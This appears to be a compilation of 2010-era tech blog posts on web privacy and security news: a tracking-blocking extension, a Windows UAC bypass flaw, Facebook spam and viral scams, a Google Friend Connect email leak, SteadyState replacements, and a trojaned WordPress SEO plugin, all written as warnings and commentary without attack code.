Disable Third Party Tracking Using Disconnect

Each and every website you visit tracks your moments across the internet. This is basically done through cookies, URL redirecting and more. Many of the sites then use this data to customize advertisements displayed to you.

Disconnect Disable Third Party Tracking

If you are not comfortable with sharing your data with third-party websites, you can now try out a new extension called Disconnect for and RockMeIt browsers.

Disconnect stops major third parties and search engines from tracking the webpages you go to and searches you do. It disable tracking on websites and depersonalizes searches on search engines like Google. It also has a nice little counter to show you the requests it has blocked and an option to easily disable unblocking for certain sites.

Disconnect was written by an ex-Googler who calls this service Web2.1 and claims that he is fixing all the wrongs on the web right now. If you are looking to disable third party tracking head over to http://www.disconnectere.com/ and download the for Chrome or RockMeIt.

(Source: TechCrunch)

New 0-day Vulnerability in Windows Circumvents UAC

When Microsoft added UAC (User Account Control), the promise was that it will make Windows more secure. Pardon me if I come across as a cynic, but all it seems to be capable of doing is annoying users. Yes, Windows 7 makes UAC a lot more bearable, but it’s still annoying. On top of that, it doesn’t actually do a lot to prevent malware attacks or malicious program execution. To make things even worse, a new flaw has been uncovered that can be used to completely bypass UAC in Windows Vista and 7.

The developers of popular security software Pervx spotted a new 0-day vulnerability being discussed in a Chinese forum. According to them, “This is a serious flaw because it resides in win32k.sys, the kernel mode part of the Windows subsystem. It is a privilege escalation exploit which allows even limited user accounts to execute arbitrary code in kernel mode.”

This flaw basically enables an attacker to execute applications with system (full) privileges. Unfortunately, there is not a lot you can do to keep yourself safe at this point of time. Sophos has suggested a workaround; however, it is not known how effective the proposed safety measure is.

Email Scams Now Hit Facebook Messaging

launched their new Facebook messaging service with fanfare saying that it would be a great way to communicate with people, with less spam. However, it looks like they still have quite a lot of work to do with fighting spam in Facebook Messaging.

According to a Business Insider writer, his Facebook Email account has already received a spam message where the sender said that he had won some money and in order to get it, he would have to send some personal details along. Such type of spam messages are very common with regular email and are usually marked as spam by services such as and Hotmail.


However, Facebook messaging is yet to encounter such messages and will have to filter such messages out and mark it as scam. Facebook Email/Messaging is yet in its infancy and not widely used, so they still have a lot of time on hands before a huge number of users begin to use.

Time to start polishing the rough edges then.. I mean spam filters to track such common spam messages. No?

20% of Facebook Accounts are Infected?

bitdefender-safegoAccording to BitDefender, 2 out of 10 Facebook Walls (or Newsfeeds) are infected or at risk in some way. In October, BitDefender, a well known anti-virus and security provider, launched a Facebook app called BitDefender safego. Safego scans your Facebook wall posts to determine if there are any links to bad apps or risky links. Here’s a quote from BitDefender:

facebook-infectionBitDefender safego > Since its launch,BitDefender safego has managed to scan 17 million Facebook posts and it has detected infections on the news feeds of around 20% of its users.We are glad we’ve been able to warn our users of these threats and we’ll continue to focus our efforts on adding new security features and increasing our detection rate. Thanks everyone for your feedback and remember: if your friends stay safe, then you’re safe!

In addition to all of Facebook’s privacy problems, everyone should know by now that it’s a huge source of infections for Windows PCs. BitDefender apparently decided that it was time to help warn people about this problem.

The free BitDefender safego app is currently in Beta testing, and you can try it out by visiting the page while logged into Facebook. In addition to the link and app checking abilities of BitDefender safego, it also checks your profile for information that you should not be sharing.

I was fortunate enough to get a clean bill of health from safego, can you say the same thing about your Wall? Give safego a try now to be sure.

Really Cool Facebook Revolving Images Scam

With 500+ million people, 500= millions scams are bound to happen. Another one sleazy scam is now underway and it involves showing people "Really cool Facebook revolving images".


The messages is spreading virally and I had to delete around 9 messages from my wall recently. The scam looks to be spreading virally. As always do not click on this link and delete it from your wall if you see it.

P.S. I visited the site in question to see what it had to offer, but it is just a parked page, so nothing to write home about here. Safe Facebooking.

Facebook 360 Rotate Effect Scam

Update: Looks like this scam is spreading differently now. Users are now writing on other people’s walls with the text "Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/"

Update 2: This problems seems to be user-initiated where they are enticed to copy and paste some JavaScript into their browser address bar, please do not copy paste any unknown JavaScript in the address bar as it can spread the scam more.

Google Friend Connect Exploit Allows Users To Harvest Emails

TechCrunch is reporting that an exploit in Google Friend Connect is allowing users to harvest email addresses for logged in users when you visit a website. This exploit was harvested when a user visited guntada.blogspot.com which is now blocked by Google.

According to TechCrunch this happened when you were logged in to your or Google account. However, only your email address was harvested so this is not only a big security hole but also a big privacy breach.

Google FriendConnect Exploit Email

Once you visited the said site, you would receive an email to your logged in address as shown above. Scary right. Google is already fixing it as we speak, we will update this post once we receive an update from Google.

Update: Google Spokesperson Lily Lin sent us the following statement:

We quickly fixed the issue in the Google Apps Script API that could have allowed for emails to be sent to Gmail users without their permission if they visited a specially designed website while signed into their account. We immediately removed the site that demonstrated this issue, and disabled the functionality soon after. We encourage responsible disclosure of potential application security issues to [email protected]

Who Checked Your Facebook Profile Scam Underway

Ok, I am not tired of unearthing these scams, including some Pedophile scams unearthed by Clif, but they just don’t go away. A new Facebook scam is now underway, where users are enticed to use a feature to find out who visited their profiles, anyone?

Facebook Profile Visit Scam

As enticing as this feature sounds, it is practically impossible to know such kind of information using apps thanks to the restrictions Facebook has put in. So first of all such apps are a farce, and secondly, they are only interested in luring people into clicking on the link you share and then fooling you into sharing it with your friends too.

These kinds of attacks have been very popular on Facebook to spread links that do nothing. Of course most of these scams do little damage, but it spreads virally thanks to the number of users who use Facebook. The newest scam has a link with the text “Check Who Viewed YoUr Fbook Profile – An Easy App to Check Who Viewed YoUr FaceBook Profile. It Really Words So don’t Wait Check Out Now!”

Facebook Profile Scam

For the record, the screenshot above is filled with references to I am malware site.

Once again, a simple advice to people who use Facebook. Everything that glitters is not gold, likewise, everything with a link and enticing text on Facebook is not real, so stay away from clicking it.

Are Public Libraries Still at Risk Because of Microsoft?

A reason to panic?

public-library-iconBack in April of this year, Yardena Arar posted an article at Windows Secrets titled Microsoft decision puts public libraries at risk.

What did Microsoft do that puts libraries at risk?

They retired Windows SteadyState. In case you haven’t heard about it, SteadyState is a free application for Windows XP and Vista which completely protects a Windows operating system from everything except a hardware crash. It makes Windows almost bullet-proof. Thousands of home users, internet cafes, schools and public libraries depend on SteadyState for protection. However, it won’t be available for Windows 7.

According to Yardena,

… not only is SteadyState incompatible with Win7, Microsoft says it has no plans to introduce a Windows 7-compatible version. That’s leaving some IT managers scrambling for replacement technology and others vowing not to upgrade to Windows 7 at all.

Windows SteadyState is going away?

I recently discovered that it’s not only unavailable for Win7, SteadyState won’t be available after Dec 31st of this year. That’s a twisted Happy New Year’s wish to everyone wanting to use it on XP or Vista. If you plan on using it, be sure to download SteadyState from Microsoft, before it’s too late.

Are there alternatives to SteadyState?

If you settled for the answer given in that Windows Secrets post, you’d give up. In the article, Yardena says:

Third-party solutions, such as Faronics’ Deep Freeze, don’t appeal to cash-strapped educational institutions, which are already spending considerable money upgrading to Windows 7.

Worse yet, if you listen to Microsoft, they’ll tell you that you don’t need it. Here’s the Microsoft spin:

We have just released a whitepaper along with an accompanying document that describes Group Policy settings that you can use to configure computer and user settings and also a reference excel worksheet which can be used to look up and filter the settings described in the whitepaper. (source)

What a load of techno-crap! Does Microsoft think a librarian, teacher, cyber-café owner, or home user is going to read their white papers?

What is my suggestion for replacing SteadyState?

Fortunately, a security company named Comodo, recently released a free replacement for Windows SteadyState. As far as I can tell, Comodo Time Machine does nearly everything SteadyState does. It’s currently supported and works in Windows XP, Vista and 7.

arrow-down-double-3Download Comodo Time Machinecomodo-time-machine-icon_thumb

If you are interested in Comodo’s offer, check out this Video Review of Time Machine.

Why do we need Windows?

Why does a public library need to depend upon Microsoft for all of their software needs? The answer from any Open Source enthusiast would be Get rid of Windows!. If you need some arguments to use against your library’s or school’s addiction to Microsoft, be sure to read about Windows 7 Sins: The case against Microsoft and proprietary software

Use Free and Open Source Software (FOSS)

If a librarian or teacher came to me and asked about setting up several public computers , I’d have two ready answers for them. I could save them money and practically guarantee that they wouldn’t have any spyware or virus problems.

edubuntu-icon1. I’d burn a set of Live CD’s with Edubuntu on them. They could disable the hard drives and put these in the CD Rom drives. Whenever the PC boots up, they’d have a fresh new operating system that’s ready to use and kid-proof.

2. I could also install Edubuntu on each PC normally, as this old timer shows in a video.


Microsoft doesn’t have the answer, and they don’t seem to care. However, there’s no reason to worry.   Using either of my recommendations, secure and trouble-free public PCs can be created at no cost.

Why WordPress Needs To Overhaul Their Plugin Repository and Introduce Safety Checks

I have written quite a few plugins including WordPress Automatic Upgrade and understand how things work within WordPress.

Earlier today, I wrote about a very dangerous plugin doing the rounds of the Internet called BlogPress SEO. The plugin is nothing but a Trojan horse which siphoned sensitive data to a third party and allowed them to login to the plugin user’s admin interface without having access to the admin password.

WordPress Security

That plugin is not in the WordPress repository and will never be, but there are thousands of plugins which are already in the repository and thousands which will eventually be part of it. Here is the catch, adding a WordPress plugin to the repository is as easy as sending an email, you just create a legitimate plugin, upload it to SVN and it’s there in the repository for everyone to use.

Now, here is the problem. As far as I believe there are no checks on what code is added to a plugin and to top that there are no checks at all to future updates. In plain words, I can create a legitimate plugin and introduce it to the repository. After that, whatever updates I make to it will never be checked (other than by clever WordPress users who sift through code), since the WordPress plugin updates are based on SVN trunks.

Any new trunks you create will be made available as a update to the end user, regardless of what code you put into it. Now, this may not be alarming since there are hardly any scams related to WordPress plugins within the repository, but today’s event goes on to show that it can be exploited. It does not take much effort to get in a plugin into the repository itself, so a scammer/hacker will be able to create multiple plugins and then add exploit code to it and offer it as updates. By the time the exploit is discovered, it might be too late for users who have already updated and sent out sensitive information to the hacker.

Now, while I am making a valid point here, there is really no foolproof way to stop this problem. Of course, it would help if there are safety checks and maybe a community based checking of code before it actually is made available as an update to users. Community based code checks are hard, if not impossible, because it will involve people to actually check the updated code before it is made available to users. This will also add a hassle to developers who are contributing for free, however, in the end it will be beneficial to everyone.

Once again the approach of checking code is not exactly foolproof. A recent example involves and , who now have a very strict process of approving extensions and it causes problems to developers. However, both of them did let through/had or which snooped on sensitive information and passed them on to third parties, some without even you having to install those extensions. The most recent example being Firesheep, an extension which allowed you to extract cookies for and and then used it to login to these networks (P.S. Install BlackSheep to stay safe from Firesheep).

Now here is the big problem, none of these harmful extensions are available through the repositories, if they are, they are quickly taken off, but people can still go ahead and install these. Just like Firefox has the ability to block extensions (they blocked .NET and WPF add-ons from Microsoft), and Google Chrome has developed features in the browser to block unsafe extensions, WordPress has to take steps to block harmful plugins at the core. They have to have the ability to inform users or explicitly block plugins which are harmful.

Considering how huge a community WordPress has, it would be easy to have a system in place to report unsafe extensions, no matter if they are present in the repository or not, along with providing a friendly warning to users that the plugin they are about to install might be unsafe. In addition to that, they have to move towards encouraging more and more developers to use the WordPress repository for plugins. I had written about the benefits of users adding their plugins to the WP repo on WLTC and saw many developers unhappy with the system, so this might take a while.

If they add this feature, and it works on the fly, it would be one of the best features I could use. Though I am a experienced plugin developer and have coded plugins such as WordPress Automatic Upgrade, I fear for the millions of people who might start adding plugins which are really bad.

Hope WordPress does something about this as this could easily get out of hand. The coder of BlogPress was foolish, he wrote code that could easily be identified, imagine intelligent people being able to write code which cannot be identified and the threats just multiply.

(Image Credit: Clickonf5.org)

WARNING: Don’t USE BlogPress SEO Plugin On WordPress, It’s A Scam and Trojan

WordPress is an open community and practically anyone can develop plugins or themes for it. However, there are several shady plugins for WordPress out there which you might as well stay away from.

One such plugin is called BlogPress SEO, which promises users hundreds of backlinks once you install it. However, don’t fall for it, it is a trap and will expose your login information to the developer of the plugin and will allow them to automatically login to your blog.

There are couple of blog posts from Yoast and Mtekk which expose the big problems with this plugin. First of all, this plugin stealthily emails your admin email address to the author of the plugin. The second and bigger problem is that, the plugin has a function which allows the plugin author to bypass the WordPress login.

Yes, you read it right, the plugin first emails your admin email to the author and then allows him to login to your WordPress admin without a password. Scary right.

If you have installed the BlogPress SEO plugin, you have to do two things. First of, deactivate the plugin ASAP. Secondly, change your admin email address. Changing your password will do no good. Thirdly, only install plugins which are available in the WordPress repository as they are safe.